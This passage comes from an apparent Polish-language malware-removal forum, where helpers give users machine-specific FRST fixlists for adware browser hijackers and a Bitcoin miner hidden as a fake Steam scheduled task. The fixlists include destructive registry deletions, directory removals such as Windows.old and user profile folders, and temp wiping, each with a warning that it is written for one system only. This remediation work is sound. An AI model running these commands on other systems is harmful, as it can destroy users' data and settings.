(Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\Draft.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.delta-homes.com/?type=hp&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.delta-homes.com/?type=hp&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.delta-homes.com/?type=hp&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.delta-homes.com/?type=hp&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} HKU\S-1-5-21-1067321925-3578864132-775108078-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.delta-homes.com/web/?type=ds&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} HKU\S-1-5-21-1067321925-3578864132-775108078-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://rts.dsrlte.com?affID=na HKU\S-1-5-21-1067321925-3578864132-775108078-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.delta-homes.com/?type=hp&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T HKU\S-1-5-21-1067321925-3578864132-775108078-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.delta-homes.com/web/?type=ds&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} URLSearchHook: HKLM-x32 - Default Value = {CCC7B159-1D8C-11E3-B2AD-F3EF3D58318D} URLSearchHook: HKLM-x32 - SiteFinder - {CCC7B159-1D8C-11E3-B2AD-F3EF3D58318D} - C:\Program Files (x86)\SiteFinder\SiteFinder.dll (Site Finder) StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe http://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T SearchScopes: HKU\S-1-5-21-1067321925-3578864132-775108078-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3319709&octid=EB_ORIGINAL_CTID&ISID=MEE10CFD4-EB9B-460A-A753-C9B5135E9FF0&SearchSource=58&CUI=&UM=6&UP=SP43D5FC5E-9529-43C6-91A0-0DBF37BD02FC&q={searchTerms}&SSPV= SearchScopes: HKU\S-1-5-21-1067321925-3578864132-775108078-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3319709&octid=EB_ORIGINAL_CTID&ISID=MEE10CFD4-EB9B-460A-A753-C9B5135E9FF0&SearchSource=58&CUI=&UM=6&UP=SP43D5FC5E-9529-43C6-91A0-0DBF37BD02FC&q={searchTerms}&SSPV= SearchScopes: HKU\S-1-5-21-1067321925-3578864132-775108078-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.delta-homes.com/web/?type=ds&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T&q={searchTerms} SearchScopes: HKU\S-1-5-21-1067321925-3578864132-775108078-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = http://www.mystart.com/results.php?gen=ms&pr=manycam&id=manycam_ot&v=4_0&ent=ch_5007&q={searchTerms} SearchScopes: HKU\S-1-5-21-1067321925-3578864132-775108078-1000 -> {B272BCF2-5AD3-4AA4-B913-39EA11A38826} URL = http://rts.dsrlte.com/?affID=na&q={searchTerms}&r=502 BHO: Object Browser -> {11111111-1111-1111-1111-110311281150} -> C:\Program Files (x86)\Object Browser\Object Browser-bho64.dll (Object Browser) BHO: Sense -> {11111111-1111-1111-1111-110611191115} -> C:\Program Files (x86)\Sense\Sense-bho64.dll (Object Browser) BHO: iWebar -> {11111111-1111-1111-1111-110611511123} -> C:\Program Files (x86)\iWebar\iWebar-bho64.dll (iWebar) BHO: RoyalCoupon -> {366ded97-4204-45d0-93eb-0c1d16c23c94} -> C:\ProgramData\RoyalCoupon\Fb9GF4v6BPhRX4.x64.dll () BHO: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro64.dll (Goobzo Ltd.) BHO: topBuoyeR -> {af1776a4-411b-4e0b-97f9-eefeb8cdf1e3} -> C:\ProgramData\topBuoyeR\LYebxzgH42TDaP.x64.dll () BHO: RoyalCoupon -> {b92b1bce-6414-4005-8160-f2ce96ad4f03} -> C:\ProgramData\RoyalCoupon\M4ecHV3gYe2nyQ.x64.dll () BHO: QueenCoUipon -> {bf6f7f4a-65d9-4033-9a7f-d2872772a62b} -> C:\ProgramData\QueenCoUipon\gq69RZttkoUmNJ.x64.dll () BHO: QueenCoupon -> {df923c2c-4ecb-458c-a717-1faf2ac92507} -> C:\ProgramData\QueenCoupon\I9adfyO3YubsgR.x64.dll () BHO-x32: Object Browser -> {11111111-1111-1111-1111-110311281150} -> C:\Program Files (x86)\Object Browser\Object Browser-bho.dll (Object Browser) BHO-x32: Sense -> {11111111-1111-1111-1111-110611191115} -> C:\Program Files (x86)\Sense\Sense-bho.dll (Object Browser) BHO-x32: iWebar -> {11111111-1111-1111-1111-110611511123} -> C:\Program Files (x86)\iWebar\iWebar-bho.dll (iWebar) BHO-x32: AdvanceElite 1.0.0.6 -> {3b2cb4c8-72ab-4b25-8fa1-219b36a60bed} -> C:\Program Files (x86)\AdvanceElite\AdvanceEliteBHO.dll (AdvanceElite) BHO-x32: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro.dll (Goobzo Ltd.) BHO-x32: RoyalCoupon -> {b92b1bce-6414-4005-8160-f2ce96ad4f03} -> C:\ProgramData\RoyalCoupon\M4ecHV3gYe2nyQ.dll () BHO-x32: QueenCoupon -> {df923c2c-4ecb-458c-a717-1faf2ac92507} -> C:\ProgramData\QueenCoupon\I9adfyO3YubsgR.dll () Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File Toolbar: HKLM-x32 - SiteFinder - {CCC7B159-1D8C-11E3-B2AD-F3EF3D58318D} - C:\Program Files (x86)\SiteFinder\SiteFinder.dll (Site Finder) FF Plugin-x32: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (globalUpdate) FF Plugin-x32: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (globalUpdate) FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\delta-homes.xml FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystarttb.xml FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml FF HKLM-x32\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\abnkhfcq.default\extensions\faststartff@gmail.com FF HKLM-x32\...\Firefox\Extensions: [detgdp@gmail.com] - C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\abnkhfcq.default\extensions\detgdp@gmail.com FF StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T CHR HKLM\...\Chrome\Extension: [noajmlkipclmeolfcnflkjhijkigpfjh] - C:\Users\x\AppData\Local\Google\Chrome\User Data\Default\Extensions\noajmlkipclmeolfcnflkjhijkigpfjh.crx [2014-12-12] CHR HKLM-x32\...\Chrome\Extension: [noajmlkipclmeolfcnflkjhijkigpfjh] - C:\Users\x\AppData\Local\Google\Chrome\User Data\Default\Extensions\noajmlkipclmeolfcnflkjhijkigpfjh.crx [2014-12-12] CHR StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\Optimizer Pro C:\ProgramData\18173724244574463488 C:\ProgramData\374311380 C:\ProgramData\d2446020-ddff-402b-b064-199d2ce66b2b C:\ProgramData\fc3609e973c3e600 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZipper C:\Users\x\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader C:\Users\x\Downloads\*.part C:\Windows\System32\drivers\{*}Gw64.sys Reg: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Optimizer Pro" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SPDriver" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Yahoo! Search" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\YTDownloader" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przez Panel sterowania odinstaluj: - Adware AdvanceElite, istartsurf uninstall, iWebar, Object Browser, QueenCoUipon, Remote Desktop Access (VuuPC), RoyalCoupon, Search Protect, Sense, Shopper-Pro, SiteFinder, sweet-page uninstall, topBuoyeR, WildWestCoupon, WindowsMangerProtect20.0.0.722, WinZipper, WorldofTanks, YTDownloader. - Przeglądarkę Google Chrome, którą adware przekonwertowało ze stabilnej do development. Przy deinstalacji zaznacz Usuń także dane przeglądarki. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 4. Zrób nowe logi FRST z opcji Scan, zaznacz pola Addition i Shortcut, by powstały ponownie trzy logi. Dołącz też plik fixlog.txt.

W raportach nic nie widzę. Jednakże sądzę, że przekierowania produkuje któreś pozornie poprawne rozszerzenie. W Google Chrome widać następujące ustawienia: Chrome: ======= CHR DefaultSearchKeyword: Default -> duckduckgo.com CHR DefaultSearchURL: Default -> https://duckduckgo.com/?q={searchTerms} CHR DefaultSuggestURL: Default -> https://ac.duckduckgo.com/ac/?q={searchTerms}&type=list CHR Profile: C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Prezentacje Google) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-01] CHR Extension: (Dokumenty Google) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-01] CHR Extension: (Dysk Google) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-01] CHR Extension: (YouTube) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-01] CHR Extension: (Adblock Plus) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2014-11-02] CHR Extension: (Szukaj w Google) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-01] CHR Extension: (Silverlight for Chrome) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\dcfphkecmijelamacdgpllplnlpkeiea [2014-12-21] CHR Extension: (Arkusze Google) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-01] CHR Extension: (Avira Browser Safety) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2014-11-02] CHR Extension: (Google Wallet) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-01] CHR Extension: (Gmail) - C:\Users\Lenovo T500\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-01] CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - No Path Preintegrowane rozszerzenia, Adblock Plus i Avira są bezpieczne. Jako jedyny podejrzany zostaje więc świeżo doinstalowany dodatek Silverlight for Chrome. Notabene: to nie jest wtyczka Microsoftu tylko rozszerzenie nieoficjalne, które ma jakoby ułatwiać "sprawdzanie i instalację aktualizacji". Proponuję sprawdzić czy przekierowania nadal będą występować po jego wyłączeniu i wyczyszczeniu Historii.

Podkręślę na wszelki wypadek: w pierszych logach w ogóle nie było żadnych objawów infekcji i problem z pingiem miał inną przyczynę. To dopiero potem gdzieś w czasie "Fixa" FRST przypadkowo nabyłeś adware. Jeśli chodzi o bieżącą sytuację, to usunięte obiekty pomyślnie odtworzone, ale i tak jest tu jeszcze co robić. Pozostały odpadki adware i Norton Intrnet Security. Akcja: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hppp&ts=1420381661&from=cor&uid=WDCXWD10EZEX-08M2NA0_WD-WMC3F281549915499 CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hppp&ts=1420381661&from=cor&uid=WDCXWD10EZEX-08M2NA0_WD-WMC3F281549915499" CHR DefaultSearchKeyword: Default -> mystartsearch CHR Extension: (PriceLuess) - C:\Users\Mikołaj\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkngfjpfofkopgcobmmjmjjonnanfjje [2015-01-04] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [Not Found] StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File R4 IOMap; \??\C:\Windows\system32\drivers\IOMap64.sys [X] C:\Program Files (x86)\Opera C:\Program Files (x86)\PriceLuess C:\Program Files (x86)\Temp C:\Program Files (x86)\XTab C:\ProgramData\9d8b341775c5ca4a C:\ProgramData\IHProtectUpDate C:\ProgramData\PriceLuess C:\ProgramData\WindowsMangerProtect C:\Users\Mikołaj\AppData\Local\Chromatic Browser C:\Users\Mikołaj\AppData\Local\Comodo C:\Users\Mikołaj\AppData\Local\Opera Software C:\Users\Mikołaj\AppData\Local\Torch C:\Users\Mikołaj\AppData\Roaming\RHEng C:\Users\Mikołaj\AppData\Roaming\mystartsearch C:\Users\Mikołaj\AppData\Roaming\omiga-plus C:\Users\Mikołaj\AppData\Roaming\Opera Software C:\Users\Administrator C:\Users\HomeGroupUser$ C:\Users\Gość C:\Windows\SysWOW64\GroupPolicy\GPT.INI RemoveDirectory: C:\found.000 RemoveDirectory: C:\found.001 RemoveDirectory: C:\found.002 RemoveDirectory: C:\Windows.old RemoveDirectory: C:\Windows.old.000 EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. Zastosuj Norton Removal Tool. 4. Zrób nowy log FRST z opcji Scan, zaznacz pole Addition, by pozyskać dwa logi. Dołącz też plik fixlog.txt. .

Basienkaa85, nowe raporty (wystarczy cały komplet z FRST) dostarcz już tu w temacie, by było porównanie czy w międzyczasie zaszły jakieś zmiany.

Tak, jest tu Bitcoin Miner udający "klienta Steam" i uruchamiany za pomocą Harmonogramu zadań: Task: {0E51D6D7-4258-41C6-AFD0-546DD08A9F4B} - System32\Tasks\Steam_x64-S-2-106-91 => C:\Users\Puderniczek\AppData\Roaming\NVIDIA\CODEXi\Steam [2014-12-19] () Przeprowadź następujące działania: 1. Przez Panel sterowania odinstaluj reklamiarza Pandora Service. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {0E51D6D7-4258-41C6-AFD0-546DD08A9F4B} - System32\Tasks\Steam_x64-S-2-106-91 => C:\Users\Puderniczek\AppData\Roaming\NVIDIA\CODEXi\Steam [2014-12-19] () C:\Users\Puderniczek\AppData\Roaming\NVIDIA\CODEXi StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File HKU\S-1-5-21-2794411941-477867369-3393817368-1000\...\Run: [Mobile Partner] => C:\Program Files (x86)\Huawei E5372\Huawei E5372 S3 mdf16; \??\C:\Users\Puderniczek\AppData\Local\Temp\mdf16.sys [X] S3 mvd23; \??\C:\Users\Puderniczek\AppData\Local\Temp\mvd23.sys [X] Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Hold Page jest zainstalowane w każdej przeglądarce z osobna. Akcja: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com C:\Program Files (x86)\Temp Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale rozszerzenia Adblock Plus i Gmail Notifier trzeba będzie przeinstalować. 3. W Google Chrome: - Ustawienia > karta Rozszerzenia > odinstaluj Hold Page - Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres sweet-page.com, przestaw na "Otwórz stronę nowej karty" 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Temat przenoszę do działu do działu Software. Nic tu nie wskazuje, by poblem tworzyła infekcja. Natomiast bardzo silne podejrzenie budzi McAfee. Proponuję na próbę go usunąć i sprawdzić wyniki: 1. Przez Panel sterowania odinstaluj McAfee AntiVirus Plus. Następnie zastosuj narzędzie McAfee Consumer Product Removal Tool. 2. Zresetuj system. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Wypowiedz się czy coś się zmieniło.

Problem tworzy szkodliwe rozszerzenie UddQc6Jrlr zamontowane w Firefox: FF Extension: UddQc6Jrlr - C:\Users\Mikus\AppData\Roaming\Mozilla\Firefox\Profiles\u894lesq.default-1381919056284\Extensions\{cc5be304-cd48-4ebc-bd30-67f7edeaefb7} [2014-12-29] 1. Odinstaluj stare wersje i zbędniki: Adobe Flash Player 15 ActiveX, Adobe Flash Player 15 Plugin, Adobe Reader XI (11.0.02), Adobe Shockwave Player 12.0, Akamai NetSession Interface, Java 7 Update 60, JavaFX 2.1.1, MyFreeCodec, OpenOffice.org 3.2, Opera 11.11. Instalacja najnowszych odbędzie się na końcu. 2. W Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 3. W Google Chrome: - Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres sweet-page.com, przestaw na "Otwórz stronę nowej karty". - Ustawienia > karta Ustawienia > Wygląd i zaznacz "Pokaż przycisk strony startowej" > klik w Zmień i usuń adres sweet-page.com. 4. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\...\Chrome\Extension: [ajbfjlbjonnckokbmkeiammcgkdciial] - C:\Users\Mikus\AppData\Local\Temp\tbch.crx [Not Found] URLSearchHook: HKU\S-1-5-21-1441841916-1275126410-3063703315-1000 - (No Name) - {8532a8b7-c06a-41bb-936a-8ce73e4711ed} - No File HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1441841916-1275126410-3063703315-1000\...\Run: [LightShot] => C:\Users\Mikus\AppData\Local\Skillbrains\lightshot\Lightshot.exe S4 sptd; System32\Drivers\sptd.sys [X] S3 TEAM; system32\DRIVERS\RtTeam60.sys [X] Task: {02685336-0BFF-4F6C-9E6C-F0090D9234A6} - System32\Tasks\{779689FF-CCDF-406C-8FEA-947D3EB44A46} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{153898EE-EECA-471E-8E33-C8485EA84C07}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {1D19BA5A-1AF6-49C5-9C64-AADA31B86051} - System32\Tasks\{43F6DD23-29A7-4548-8721-619679E9B816} => pcalua.exe -a C:\Users\Mikus\Desktop\Zumas.Revenge.v1.0.Cracked-F4CG_zolin\setup.exe -d C:\Users\Mikus\Desktop\Zumas.Revenge.v1.0.Cracked-F4CG_zolin Task: {315A49F9-4341-40A9-B27A-E2F1022DEBA4} - System32\Tasks\{9BED32EE-4706-4024-9348-209EE86B1E18} => pcalua.exe -a "C:\Users\Mikus\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6RTRKYNZ\ImageShackToolbar[1].exe" -d C:\Users\Mikus\Desktop Task: {6C1CD95D-F706-4D74-99FD-21FB14DA12A3} - System32\Tasks\{583F1885-4329-43CD-A3F1-7DF8676298E4} => pcalua.exe -a C:\Users\Mikus\Desktop\LCVM_PCDRV_US_1_03_02.exe -d C:\Users\Mikus\Desktop Task: {CBA2652D-DB9E-4137-A263-95076034F755} - System32\Tasks\{8139D3A7-823E-4BC0-861B-B67D06427267} => pcalua.exe -a "C:\Program Files\MailShare\Downloads\TurboMahjong.exe" -d "C:\Program Files\MailShare\Downloads" Task: {E60BB5C5-D662-41C9-AA00-F82E0643B292} - 